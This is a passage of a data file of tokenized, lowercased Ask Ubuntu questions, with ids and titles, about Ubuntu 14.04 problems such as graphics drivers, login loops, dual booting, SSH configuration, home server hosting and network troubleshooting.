selecting previously unselected package xboxdrv . ( reading database ... 226344 files and directories currently installed . ) preparing to unpack ... /xboxdrv_0.8.5-1_amd64.deb ... unpacking xboxdrv ( 0.8.5-1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... setting up xboxdrv ( 0.8.5-1 ) ... the end result : now i have a still-broken xboxdrv installation , and no nvidea driver support .
518898	ubuntu servers protection	here is my needs : i need to protect data from being stolen on servers and those servers are not physically secured . first i just wanted to base security solution on root password protection but password are easy to hack using livecd and data can be mounted readonly and therefore stolen . then i wanted to use full disk encryption . but you need to manually enter the encryption key each time you boot or reboot the server , which is not practical . therefore i think of putting encryption key on usb stick , but still the key can be discovered and data stolen and moreover some servers are virtuals . the ideal solution would be to encrypt the full disk , boot without asking encryption key and have to enter encryption key manually only if you remove the hard drive and put it on another server or try to mount fs using livecd . is that possible ? thank you all ,
518899	allow www-data to create directories	how would i , with security in mind , allow www-data to create directories within /var/www/html/assets/img and its sub-directories ? i have a php script that automatically creates directories with 777 permissions , but www-data currently does n't have the required permissions to allow that .
518900	quotation software	i 'm looking for a quotation manager ( i.e . a program to organize and comment textual citations ) , friendly to the ubuntu desktop . i found textcite , but i 'd prefer something native to linux . what options do we have ?
518901	how do i get ubuntu to recognize my graphics card ? ( trusty tahr )	first of , hello ! i have a asus x552c laptop with a nvidia geforce 710m graphics card , and i do have some issues . i have looked online and i 've tried mostly everything , but it just wo n't work for me ! i have downloaded the latest nvidia driver , it however says ( sometimes ) it ca n't install it or that a newer driver is already in use . however , i find myself stuck having to use a propietary driver because the actual nvidia driver is not there ! i am running 14.04.1 trusty tahr and i am in desperate need of help ! word of warning : i am not good at coding , i know no commands . i basically had to learn the hard way what it meant to disable the x-server and so on . i am really hoping if you could speak to me ( who got a new laptop and just recently migrated from xp ) as if i was a child , try to explain to me like i 'm really dumb ! : p thank you in advance !
518905	i only have 1gb of ram , what can i do to improve the performance on my 32-bit 14.04 system ?	i 'm running a fresh install of ubuntu on an old imac . it was going painfully slow on osx so i wiped that and installed ubuntu overtop of it hoping it would speed things up a bit . i 'm not going to be doing any hardcore gaming or anything , but i just wish it would n't become almost unresponsive whenever an album of gifs starts loading . what are some tricks to speed up the computer and use less ram ? thanks in advance . specs : memory : 983.1 mib processor : intel core 2 duo cpu t7300 @ 2.00ghz x 2 graphics : gallium 0.4 on amd rv610 os type : 32-bit disk : 245 gb
518906	stuck in the login loop	as the title of the questions says , i am stuck in the login loop . the difference from all the questions out there is that i ca n't log in as a guest and i ca n't log in using the tty ( i keep getting wrong login ... ) . before this happened i got an error saying something about a file missing in some ./folder i really can not recall the error as i just pressed ok and it never appeared again , but since then i am unable to log in . what could i do to log in successfully ? edits : the content of /etc/shadow does specify the existence of my user as well as /etc/password still when logging thru the tty , it signals wrong login the content of /var/log/auth.log fir the last 3 attempts is : lightdm : pam_succeed_if ( lighted : auth ) : requirement `` user in-group nopasswordlogin '' not met by user `` myusername '' login [ 1090 ] : pam ? unix ( login : auth ) : authentication failure ; logname=login uid=0 euid=0 tty=/dev/tty2 ruser= thost= user=myusername login [ 1090 ] : failed login ( 1 ) on /dev/tty2 for 'myusername ' , authentification failure . reseting password led to the same result as described above .
518907	no option to boot windows ?	i am sorry if this question has already been answered , but i was unable to find an answer that pertained to my specific problem . i recently installed ubuntu alongside windows 7 following the instructions below ( i followed the ones that specify if windows is already installed ) . how to use manual partitioning during installation ? the installation worked well ( so it seemed ) but not i am unable to boot into windows 7 , even thought i can see that its partitions are still there , untouched . i get not option or screen that allows me to choose what to boot into . any ideas what is going wrong here ? relevant information : i5 processor 128 gb ssd lenovo b 50-70 notebook edit i am running ubuntu version 14.04 . if you need any screenshots , please let me know ...
518908	ubuntu 14.04 , rhythmbox , missing gstreamer1.0-libav ( i386 ) plugin dependencies	i 've recently updated ubuntu 12.04 to 14.04 ( 64 bit version ) . the problem that i 've noticed is that rhythmbox can not play alac ( m4a ) files . also , when i run some radio stations , the systems complains that i do n't have windows media audio 8 decoder . whenever i start the playback the ubutnu suggest to install gstreamer1.0-libav ( i386 ) plugin , and then dumps an error message saying : gstreamer1.0-libav : i386 : depends : libavcodec-extra-54 ( > = 6:9.13 ) but 6:9.16-0ubuntu0.14.04.1+fdkaac is to be installed depends : libavformat54 ( > = 6:9.1-1 ) but 6:9.16-0ubuntu0.14.04.1+fdkaac is to be installed depends : libavutil52 ( > = 6:9.1-1 ) but 6:9.16-0ubuntu0.14.04.1+fdkaac is to be installed depends : libc6 ( > = 2.7 ) but 2.19-0ubuntu6.3 is to be installed depends : libglib2.0-0 ( > = 2.37.3 ) but 2.40.0-2 is to be installed now i have installed the gstreamer1.0-libav , but apparently rhythmbox is not satisfied with that version . i 've already installed ubuntu-restricted-extras and gstreamer0.1-ffmpeg . i would like to provide more information but i do n't know what 's relevant . also , i do n't know how to interpret this error message . thank you for help .
518909	ubuntu software center just opens then closes	ubuntu software center just opens then closes . when i click on the icon it just opens up freezes then closes . nothing pops up and it doesnt say anything at all . does anyone know what could be the problem ? i tried updating it and i get this : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/extras.ubuntu.com_ubuntu_dists_trusty_main_i18n_translation-en e : the package lists or status file could not be parsed or opened .
518911	how detect scanner benq 5000 in ubuntu 14.04	i have installed sane-backends-1.0.24 and sane-frontends-1.0.14 in ubuntu 14.04 for my scanner benq 5000 how to detect it in order to start scanning documents and ocr . i do n't understand the difference between sane-backend and sane-frontend , can you explain me this
518912	should we be upgrading away from ubuntu.components 0.1 ?	should we be upgrading away from ubuntu.components 0.1 in our ubuntu applications ? i am working on one of the core apps , and many were unsure as to whether the current library ( 1.1 i think ) offers anything like performance increases , or graphical tweaks .
518914	easybcd : ca n't boot into windows after ticking neogrub boot loader in easybcd	i ticked neogrub bootloader in easybcd . thus the option `` windows 7 '' is disabled , as shown in the pic below . then i reboot the system and now i ca n't enter windows 7 . what can i do ? thanks ! http : //i.stack.imgur.com/eipwz.jpg my grub info : http : //paste.ubuntu.com/8210461/ it seems the problem is core.img is at this location and looks in partition 112 for .
518915	installing ubuntu touch on android jelly bean devise	can you please guide me to install ubuntu touch on android jelly bean devise . is there a website link that provides a step by step guide to the installation .
518916	disable login prompt through ssh when no key is present	i 've set openssh server with private/public keys , with password login disabled . i was wondering if there was a way to not even show the 'login : ' prompt when someone without a key tries to connect . edit okay ... there seems to be some confusion as to what i 'm trying to achieve . so , here 's a better explanation ( i hope ) ... current setup client with key connects , and goes through the process : login as : username banner authenticating with public key `` key name '' passphrase for key `` key name '' : ******* welcome username @ hostname : ~ $ client without key connects , and goes through process : login as : username banner server refused our key what i want client without key connects , and goes through process : no key , go away .
518918	the router logon page shows when calling domain in a browser,	i am new to linux server , but i wish to run one , so i got a newly built ubuntu server with a domain transferred from win 2003 server . it seems , on localhost all works well , but when calling the domain in a browser it gets some certificate issues . regardless , when accepted to proceed it always brings up the router login page . the domain : http : //sweetqcorner.com any idea ? please , help.. thanks a lot in advance , , stanley
518921	serving multiple websites over a home dsl line	i 'm a complete noob at running my own server , and i want to install 3 different sites to be served from my mythbuntu 14.04 system at home . what i want to do is not for actual public access though , but just me and maybe a small circle of other people . however , i want the sites to be publicly reachable in the sense that i can access them from any place outside my home network . however , i do n't want to rent a domain for them , but access them just by the ip addresses . my question is : how about public ip addresses ? do i need to have as many as the number of sites i want to host ? i have a normal home dsl internet connection , and i think my isp may only be handing me a dynamic ip address - but i still have to verify that , it may also be static . in short , is it possible to host like three sites , accessible from outside , on the same box , over this infrastructure , or would i need to make arrangements with my isp for a different setup ? edit : thanks for your answers , i 'm not sure though i got it all figured out : it seems that if i have a static ip , i do n't need the dyndns service , correct ? it seems that i actually might , but i sent e-mail to my isp to confirm ( edit : no , it 's dynamic ) . checking my router 's control panel , i ca n't find a proper interface for port management . this router actually belongs to the isp , it 's a technicolor gateway tg788a1vn . it has a panel for managing firewall settings with just three preset security levels , and basically that 's it for managing the firewall ! in addition , i can `` assign '' applications , i suppose the router manages the respective ports , but i 'm not sure if `` assigning '' the https server means it gets to communicate through port 80 . would you think that 's what this panel does ? about the domain name vs. ip-only , i 'm not actually opposed to using a domain ( although ip-only might have a small security benefit ? ) , i just do n't want the extra cost . i was n't aware there are free domains available , so that 's good to know ! : - )
518924	ubuntu application update or ubuntu upgrade ?	i just typed in terminal : sudo apt-get update sudo apt-get upgrade python so i was waiting to get python but i think it 's upgrading the whole os why is this happening and i 'm new so please explain a bit more peace out !
518926	destination host unreachable	i have a ubuntu 14.04 server that i have connected to my pc via crossover cable . i am having trouble with them talking . every time i ping one of them it says destination host unreachable , please help anyone .
518928	how to write a script to `` listen '' to battery status and alert me when it 's above 60 % or below 40 % ?	i want to make a tool that alerts when battery is below 40 % or above 60 % so i can start/stop charging accordingly . i know some tools alert when battery is low , that 's not enough . is there a tool that does it when bat is high ? i would like to write a script - either shell or python , that can do this . i know the command for checking bat status : $ upower -i /org/freedesktop/upower/devices/battery_bat0 but do n't know how to `` listen '' to the battery so that whenever it 's status changes i can automatically perform an action . a link to docs will be nice , a tutorial even better . edit : i ended up using kasiya 's script with some modifications : # ! /bin/bash while true do export display=:0.0 battery_level=`acpi -b | grep -p -o ' [ 0-9 ] + ( ? = % ) '` if [ $ ? -eq 0 ] ; then if [ $ battery_level -ge 55 ] ; then notify-send -u critical `` battery charging above 60 % ( or nearing it ) . please unplug your ac adapter ! '' `` charging : $ { battery_level } % `` aplay /home/zack/startup/beep-01a.wav fi else if [ $ battery_level -le 45 ] ; then notify-send -u critical `` battery is lower 40 % ( or nearing it ) . please plug your ac adapter . '' `` charging : $ { battery_level } % '' aplay /home/zack/startup/beep-01a.wav fi if [ $ battery_level -le 15 ] ; then notify-send -u critical `` battery is critically low . system will shut-down in 5 minutes . '' `` charging : $ { battery_level } % '' aplay /home/zack/startup/beep-01a.wav sleep 300 on_ac_power if [ $ ? ! = 0 ] ; then notify-send -u critical `` system will shut-down now . '' `` charging : $ { battery_level } % '' shutdown -h 10 fi fi fi sleep 300 # 300 seconds or 5 minutes done
518929	forward laptop 's wifi into pc ethernet	i need to do a few things that can only be done on my computer , but my home internet is broken this week . the only way to get internet is on my phone . i turn on tethering and my phone acts like a wifi router which allows my laptop to access the internet , but i need my desktop to have internet because of the programs requirements to turn on . to reword , my phone has 3g and acts like a wifi hotspot which my laptop receives because it has a wifi card , but it also has an ethernet port . i need to use my cable and connect the ethernet port so that my laptop acts like a router and my pc can have access to internet but i do n't know how to configure the laptop to do that . both my computer and laptop have 14.04 . what program allows me to do this thanks in advance !
518931	ubuntu 14.04.1-amd64 crashes on startup from dvd during installation -- possibly video card driver ?	i have never used linux and was trying to install ubuntu so i can have windows/ubuntu dual boot . however , i can not quite get to the installation screen . it starts loading from the dvd ( or usv drive ) and after awhile i just get a scrambled screen and frozen computer . i checked the forums and it seems that the video card may be the culprit : amd radeon hd 6450 . unfortunately i can not get to ubuntu ( load it for trial or install it ) in order to try to fix the problem . any help will be much appreciated . p.s . please remember that i have never used linux before . thanks
518932	stream audio from youtube	i just want to stream ( whitout downloading ) a youtube video . is there an easy way to do this with python or exists a script to do that ? or i must download in a temporany file the video , convert it and play ?
518933	updated to 14.04 on netbook , super slow , not working with monitor	this is my first post , to be honest i 'm not very experienced with this . my uncle usually helps but i ca n't reach him so ... i 'm needing some help . at the moment my velocity micro m10 netbook is my only computer . i updated my ubuntu netbook remix to 14.04 because i was promoted to . net books are crazy small so i set mine up to my dell monitor and have a wireless mouse and keyboard hooked up . once everything downloaded i got to the login screen , everything looked great on the netbook but on the monitor it was like a broken up background picture ( tough to explain ) i get logged in and both the monitor and netbook screen look great but i try to move the mouse and it shows up on only one screen . i try to open the home button and it 's super slow and choppy to opening windows.the internet is slow to pop up but fast like usual once it gets going . it seems like just the os is slow . i tried checking the nvidia drivers and i guess i 've got 304 . i tried following some of what these forums say to do in the terminal but the terminal told me horrible things will happen if i proceed ( it literally told me that ) . my question is how can i fix this slowness ? and how come i can not get the monitor to display what is on my netbook screen since i did the update ? can anyone help with this strange issue or tell me how to wipe it out and try to download it again ... i feel like something must have gone wrong with the update
518935	can not login to 14.04.1 screen goes black and returns to login screen	after clean install of 14.04.1 i installed a brother printer from the command line . i optioned for encryption and lvm and on boot have to enter passphrase . on initial login i noticed an option for do not prompt for password and checked this option for my user account and i also changed my account to administrator . when i rebooted later , the correct password nor blank works as password . i simply get a black screen and the login box re-appears . i am not that familiar with command line . i also used sudo su command earlier in printer install . i 'm sure i probably broke it . i 'd like to recover instead of re-installing if possible . can boot into recovery but can not successfully accomplish password change for user .
518937	using packagemanager to uninstall latest kernel ?	the last update ( i updated 9/1/14 ) to the kernel broke my boot . i was able to boot into the previous kernel . i think the version that was stable was 3.13.0.34.40 and the update was 3.13.0.35.42 -- is there a way to use synaptic package manager to remove the latest update from my system ?
518943	why ubuntu seems progressing backwards in version 14.04 lts ?	unity is not stable , further we need more mouse clicks to get the same result . no way to add launchers to panel . with any of the gnome flavors many functionalities are lost . there is no easy way to create desktop shortcuts . gedit crashes when opening more than 4 documents and when try to open utf-8 encodig files . vino server does not work . the starting time is up to 30 seconds ( after login screen ) . wireshark crashes when begins capturing data . xorg is updated frequently and sometimes i have to configure it by hand in the terminal to make it works ( not for beginners ) . the suspend mode does not work without making many tweaks . is a pain copying or moving files between folders using files . software updater only works launching it by hand , does not starts automatically . and many other drawbacks that i do not remember now . is an unpleasant experience after using ubuntu 10.04 lts . can somebody explain me ? my system : desktop pc . processor : amd athlon ( tm ) ii x3 450 processor ă 3 memory : 4 gib graphics : geforce 6600 / pcie / sse2 os type : 64-bit disk : 1 tib ubuntu : 14_04 3.13.0-29-generic
518946	installation of apache openoffice ends because i do not have superuser privileges	during the installation process of apache openoffice 4.1.1 , when i enter the command `` dpkg -i *.deb '' the installation ended with the following message : dpkg : error : this operation needs superuser privileges . how can i solve this ? thank you for your help . artur
518947	stuck at splash-screen after upgrading to ubuntu 14.04	i upgraded from 12.04 to 14.04 . everything went well until the reboot , and i 'm currently stuck at splash-screen without having access to the login screen . i own a asus 1015pn . if i press esc during the splah-screen i get a lot of lines but the only `` [ fail ] ones '' are : - speech-dispatcher disabled : edit /etc/default/speech-dispatcher landscape-client is not configured , please run landscape config - starting configure display device for eeepc 1015pn - starting load fallback graphics device all the other lines are [ ok ] . thanks in advance for your help .
518949	no tomcat option in the preference of eclipse kepler	so , i downloaded the eclipse kepler sr2 , and followed this link but now i open my eclipse and go to window > preferences but there is no tomcat option for me to configure . i previously used to use eclipse in windows and that is where i always found tomcat to configure . can anyone please help me here ?
518950	sound mysteriously gone missing ( lubuntu 14.04 32bit )	i am running lubuntu 14.04 on a non-sse2 machine ( amd duron 1800 ) . strangely , right after installation there was no sound at all even though alsa was present and my sound card detected and installed ( c-media cmi8738 ) . later i realized pulseaudio was missing , after installation of which i got the sound . as i kept installing various software sound went missing again . not sure why or when it happened . reinstallation of pulseaudio did not help . i suspect it might have happened after i installed pipelight . whatever happened , here 's the report on the current state of matters : http : //www.alsa-project.org/db/ ? f=b9f4cc8ebcf9020387726c5b314e33c19d346a16 i appreciate your help .
518951	networking ok during install but not after reboot	( note wired not wireless ) i just put 14.04 server onto an old-ish dell box with a realtek ethernet card on eth1 ( eth0 is dead ) . lspci reports it as rtl-8100/8101l/8139 . i did a complete reformat/reinstall from a usb stick . that worked fine and the card worked via dhcp . after i rebooted , the card was listed in /etc/network/interfaces as iface eth1 inet dhcp but will not get an ip . why would it work in the install process but not after boot ?
518952	what is a good itunes alternative with .epub support ?	banshee seems good , but it does n't seem to support .epub or any other type of ebook files . i use my ipod more for reading than i do for music , so i 'd really like a program that allows me to continue putting ebooks on my device .
518953	ubuntu mobile for samsung 12 '' tablet	how can i go about putting ubuntu on my samsung galaxy note pro 12.2 with dual boot options ? that way i can have a computer when needed and android on the other . i have tried to google it , but keep coming to pages listing just the nexus devices and i honestly just want to use ubuntu on a samsung tablet . specifications : ⠀processor : samsung exynos 5420 octa 1.8 ghz ( arm-based soc with integrated mali gpu ) ⠀memory : 3gb ⠀graphics adapter : arm mali-t628 mp6 ⠀display : 12.2 inch 16:10 , 2560x1600 pixel , capacitive touchscreen , lcd ⠀hard disk : 32gb emmc flash , 32gb , 22.82gb free any help would be appreciated .
518958	error ( 5 : input/output ) warning coming from status bar	i 'm attempting to install ubuntu 14.04 on an acer aspire-5734z laptop . i 've had issues in the past with failed attempts at installing ubuntu on this machine so now i 'm turning to here for help . i 'm unfamiliar with computer code , ubuntu , and linux . i can however , take directions . any help with the image attached would be much appreciated .
518959	motd displaying content of /etc/motd generated at boot / previous login	i have an ubuntu server running at sandbox.plushu.org - if you add your key at http : //enter.sandbox.plushu.org , you can connect to the server as root @ sandbox.plushu.org . you can reset the server by pressing the reset button on http : //reset-sandbox.plushu.org . i have a custom time-sensitive motd on this server . the problem that i 'm seeing is that this motd , when regenerated ( via /etc/update-motd/* ) at login , is not displayed until the next login . the first time you log in , you will see the motd as generated at boot : the next time you log in , you will see the motd as generated the last time you logged in . what is causing this behavior ? how can it be fixed so that , on logging in , the motd is generated , then displayed ?
518960	firefox bookmarks	i just installed ubuntu 14.04 on my hp netbook . i 'm having issues with bookmarks in firefox . if i create a bookmark and just leave it loose in the bookmarks menu , then it will work fine . however , if i try to create a bookmark inside of a folder , 80 % of the time the bookmark and the entire folder will go dead . sometimes they also go dead if i open the `` show all bookmarks '' menu and move the folder around . is anyone else having this trouble with bookmarking ? any suggestions ? thanks , bronson
518965	help managing ubuntu 14.04 partition size	i currently just have ubuntu 14.04 on my laptop . the partition for it is very large , 110.85gb out of my 120gb . i tried to resize it but i ca n't change it as the minimum = its maximum size . how can i change the partition size ? i currently have windows 8.1 on a usb to boot but have no room with it . i was thinking is there a way i could delete ubuntu so then my ssd would be completely free , install 8.1 , and then install ubuntu again ? thanks !
518971	command line command to refresh gui desktop , like when pressing f5 ?	is there any command to refresh the desktop icons ( exactly like f5 button does ) ? i need this because in startup applications i set a command to mount my backup partition and i 've created a desktop link to some directories there . the problem is that the icons are not refreshed when i log in , unless i press f5 . i would like to put a command in the startup applications to do so . ( note that i do n't want to restart the gnome shell or unity , like they said here . i just need a command to do exactly what f5 does )
518972	14.04 and laptop keypad	on my laptop keyboard in windows , if numlock is off , 7=home 1=end 9=pageup 3=pagedown . but in ubuntu , it types strange characters . my end key ( 1 ) types out ~ . what can i do to fix this ? thanks !
518973	chrome always asks to be default browser and icon in dash does n't work	i have two issues with google chrome which may or may not be related . i 'm on ubuntu 14.04 . the first is that whenever i open the browser , i get the thing telling me it 's not the default browser and asking if i want to make it default . i always say yes , but it keeps appearing every time i launch the browser . if i perform an action that launches the default browser ( like ask to visit a website from dash ) , it correctly loads it in chrome . the other issue is that when i open dash and search for chrome , the top result is the generic box of tools icon with an empty program name . ubuntu clearly knows it 's chrome , since it comes up as the top result , and clicking on it successfully launches chrome . can i do something to fix the icon ? it also appears with the correct icon in the sidebar when it 's running .
518975	why changes to any partition with a lower number than a mounted partition are not permitted ?	i was looking at this comment and marty fried says `` in fact , you ca n't even do anything to any partition with a lower number than a mounted partition . '' referring to changing sizes of this partitions . since i did n't want to make unrelated comments to that answer i decided to ask a new question here . why ca n't changes to partitions with number bellow the mounted one be done ? i understand why changes in the mounted one ca n't be done , but not this . thanks !
518976	usb device fails to enumerate using xhci	i 'm trying to connect a arm development board ( precisely a nucleo board f401re ) through a usb port but , mostly , it fails to enumerate and i get these messages using dmesg [ 4788.675352 ] hub 3-0:1.0 : unable to enumerate usb device on port 3 [ 4801.324618 ] usb 3-3 : new full-speed usb device number 45 using xhci_hcd [ 4806.345879 ] usb 3-3 : device descriptor read/8 , error -110 [ 4811.471240 ] usb 3-3 : device descriptor read/8 , error -110 [ 4820.172299 ] usb 3-2 : new full-speed usb device number 47 using xhci_hcd [ 4825.193581 ] usb 3-2 : device descriptor read/8 , error -110 [ 4830.318902 ] usb 3-2 : device descriptor read/8 , error -110 [ 5839.698045 ] usb 3-2 : new full-speed usb device number 49 using xhci_hcd [ 5844.719304 ] usb 3-2 : device descriptor read/8 , error -110 [ 5849.844660 ] usb 3-2 : device descriptor read/8 , error -110 [ 5850.060881 ] usb 3-2 : new full-speed usb device number 50 using xhci_hcd [ 5855.082111 ] usb 3-2 : device descriptor read/8 , error -110 these messages keep showing , with increased device numbers , for as long as i leave the device connected . i read somewhere that error code -110 means bus power limits were exceeded ( can someone confirm this ? ) . so i provided external power to the board and confirmed it was n't drawing more than 20ma from the usb , but it did n't solved the issue . what should i do ? is there any way of disabling xhci_hcd perhaps ? i must say , though , i 'm running ubuntu from a external usb hdd . thank you in advance !
518978	edubuntu menu editor - profile manager problem	i have just loaded edubuntu 14.04.1 on three pcs that i 'm setting up for a new school . thanks to another post i was able to get the edubuntu menu editor - profile manager loaded and running . unfortunately , it does not seem to work . i created and saved a new menu , applied it to the desired group and nothing , the menu does not change . i 'm not finding much current info regarding this tool . can anyone help ? i 'm absolutely new to linux so any assistance is appreciated .
518980	why is my display controller intel when i have nvidia graphics card ?	when i run lspci command i get this : 00:00.0 host bridge : intel corporation xeon e3-1200 v2/3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 display controller : intel corporation xeon e3-1200 v2/3rd gen core processor graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation h61 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gk104 [ geforce gtx 660 oem ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gk104 hdmi audio controller ( rev a1 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) 03:00.0 usb controller : renesas technology corp. upd720202 usb 3.0 host controller ( rev 02 ) 04:00.0 network controller : qualcomm atheros ar9485 wireless network adapter ( rev 01 ) now i am no expert at linux drivers and how their graphics stuff works , but i know in windows i could display my integrated intel graphics via device manager as to ensure my computer was pushing everything thru my nvidia gtx 660 card . so my questions is , why is my display controller intel when i have an nvidia card ? or is this just the way it is supposed to be , because i have been running a couple of games that have nice graphics at maxed settings and i doubt the intel could keep up with that ... but i just ca n't figure out why it says intel under display controller . any feedback would be helpful , and i tried finding the answer to this but i am thinking it is such a simple answer that no one has ever asked before ...
518982	ubuntu 14.04 server with raid 1 and windows 7 for file backup	i have an ubuntu 14.04 server with raid 1 with 250gb ( 2 x 250gb ) . and , on my notebook , i have windows 7 . ubuntu server shows up on my notebook but wo n't copy/move any of my files that i want to backup : you need permission to perform this action on the server in the directory that i wanted ( home/scott/sbackup ) i have done : sudo chmod -r 777 * and it did n't work not only with the files i wanted to copy over to the server but even on the files that i wanted to replace files on the backup . could someone point me in the right direction ?
518985	ubuntu 14.04 and nvidia geforce ( 840m ) compatability on 64-bit laptop	my laptop diagnostic shows several pre-fails and has other issues so i am urgently shopping for a new laptop , my second using ubuntu . i need a laptop with good graphics capabilities and have come across a couple with the nvidia geforce 840m graphics card . in other words , i do not have a problem now and am hoping to avoid one . my research on ask ubuntu and elsewhere shows that there have been some bugs with ubuntu 14.04 and nvidia drivers ( not just for the 840m driver ) but that fixes were made or a least suggested . but i have seen nothing definitive , e.g . the ubuntu certification for laptops is barely starting with 14.04 . i am about to spend a 1000 dollars and would love a little more assurance before i proceed -- my understanding is that a live cd can not perform a full simulation . are there easy-to-recognize concrete factors which make compatibility ( more ) predictable , such as specific models of computer and their processors ? i am a considering a msi gp60 with an intel i5 4200m and an asus n56jn-mb71 with an intel i7 4700hq . both use an nvidia 840m graphics card .
518987	ubuntu 14.01 lts ca n't access some websites	something is wrong with ubuntu kernel and windows dhcp , dns server . first i will explain my problem in few words and then ill post all my configurations . my ubuntu computer is behind a all-in-one windows server dhcp , dns , firewall . my ubunut installation is not able to ping , traceroute , telnet some websites . ive walk trough all the tcp/ip stack troubleshooting and im still not able to see what is wrong . 80-90 percent of other websites work good . everything seems to get solved if i connect my computer directly to the router ( a dsl connection ) i have other linux and windows machines ( centos and windows 7 ) and they all work without any problem , is just with ubuntu . ive updated and reinstalled many times and still not getting the issue . i even have tcpdump on the ubuntu machine and wireshark on the windows server and i see traffic coming in for all the working sites and failed requests for those who not . here is my ifconfig : administrator @ ubica-hp-pavilion : ~ $ sudo ifconfig wlan1 wlan1 link encap : ethernet hwaddr 00:90:4b : a2:4d:89 inet addr:192.168.0.69 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :290:4bff : fea2:4d89/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:9397 errors:0 dropped:0 overruns:0 frame:0 tx packets:4113 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3284931 ( 3.2 mb ) tx bytes:536403 ( 536.4 kb ) here is my route : administrator @ ubica-hp-pavilion : ~ $ route kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.0.1 0.0.0.0 ug 0 0 0 wlan1 192.168.0.0 * 255.255.255.0 u 9 0 0 wlan1 here is my /etc/hosts 127.0.0.1 localhost 127.0.1.1 ubica-hp-pavilion # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters and the /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1 search gps.local ive changed dns to google 's and opendns 's address and rebooted and nothing happens . actually the non accesible site are resolved well , here is an example : administrator @ ubica-hp-pavilion : ~ $ dig www.ubica.com.sv ; < < > > dig 9.9.5-3-ubuntu < < > > www.ubica.com.sv ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 35868 ; ; flags : qr rd ra ; query : 1 , answer : 1 , authority : 0 , additional : 1 ; ; opt pseudosection : ; edns : version : 0 , flags : ; udp : 4000 ; ; question section : ; www.ubica.com.sv . in a ; ; answer section : www.ubica.com.sv . 86400 in a 209.239.120.202 ; ; query time : 185 msec ; ; server : 127.0.1.1 # 53 ( 127.0.1.1 ) ; ; when : mon sep 01 19:10:48 cst 2014 ; ; msg size rcvd : 61 and pinging www.ubica.com.sv , gets resolved but it never answers icmp requests : administrator @ ubica-hp-pavilion : ~ $ ping www.ubica.com.sv ping www.ubica.com.sv ( 209.239.120.202 ) 56 ( 84 ) bytes of data . from 192.168.0.69 icmp_seq=1 destination host unreachable from 192.168.0.69 icmp_seq=2 destination host unreachable from 192.168.0.69 icmp_seq=3 destination host unreachable from 192.168.0.69 icmp_seq=4 destination host unreachable from 192.168.0.69 icmp_seq=5 destination host unreachable from 192.168.0.69 icmp_seq=6 destination host unreachable ^c -- - www.ubica.com.sv ping statistics -- - 8 packets transmitted , 0 received , +6 errors , 100 % packet loss , time 14148ms and a traceroute to the same address pings back to itself : administrator @ ubica-hp-pavilion : ~ $ traceroute www.ubica.com.sv traceroute to www.ubica.com.sv ( 209.239.120.202 ) , 30 hops max , 60 byte packets 1 192.168.0.69 ( 192.168.0.69 ) 2997.073 ms ! h 2997.006 ms ! h 2996.993 ms ! h administrator @ ubica-hp-pavilion : ~ $ if i ping or traceroute any other site it works fine : administrator @ ubica-hp-pavilion : ~ $ ping www.godaddy.com ping e8804.a.akamaiedge.net ( 96.17.125.116 ) 56 ( 84 ) bytes of data . 64 bytes from a96-17-125-116.deploy.akamaitechnologies.com ( 96.17.125.116 ) : icmp_seq=4 ttl=51 time=98.2 ms 64 bytes from a96-17-125-116.deploy.akamaitechnologies.com ( 96.17.125.116 ) : icmp_seq=5 ttl=51 time=101 ms there are not iptables entrys and the firewall is off : administrator @ ubica-hp-pavilion : ~ $ sudo iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination administrator @ ubica-hp-pavilion : ~ $ sudo ufw status status : inactive as i said before , centos and windows machines are able to access the same site without any trouble so i can probably discard the windows server . and as soon as i connect my ubuntu machine directly to the dsl it starts working without trouble . ive also checked using one of the ips of the centos machines just to be sure that there is nothing blocking at ip level . here is the tcpdump of the ubuntu machine for interface when i try to ping a not workking host : administrator @ ubica-hp-pavilion : ~ $ sudo tcpdump -c 10 -i wlan1 host 192.168.0.69tcpdump : verbose output suppressed , use -v or -vv for full protocol decode listening on wlan1 , link-type en10mb ( ethernet ) , capture size 65535 bytes 19:27:39.586609 ip 192.168.0.69.2663 > 192.168.0.1.domain : 7253+ a ? www.ubica.com.sv . ( 34 ) 19:27:40.200841 ip 192.168.0.69.37076 > 192.168.0.1.domain : 43428+ ptr ? 1.0.168.192.in-addr.arpa . ( 42 ) 19:27:44.591912 ip 192.168.0.69.2663 > 192.168.0.1.domain : 7253+ a ? www.ubica.com.sv . ( 34 ) 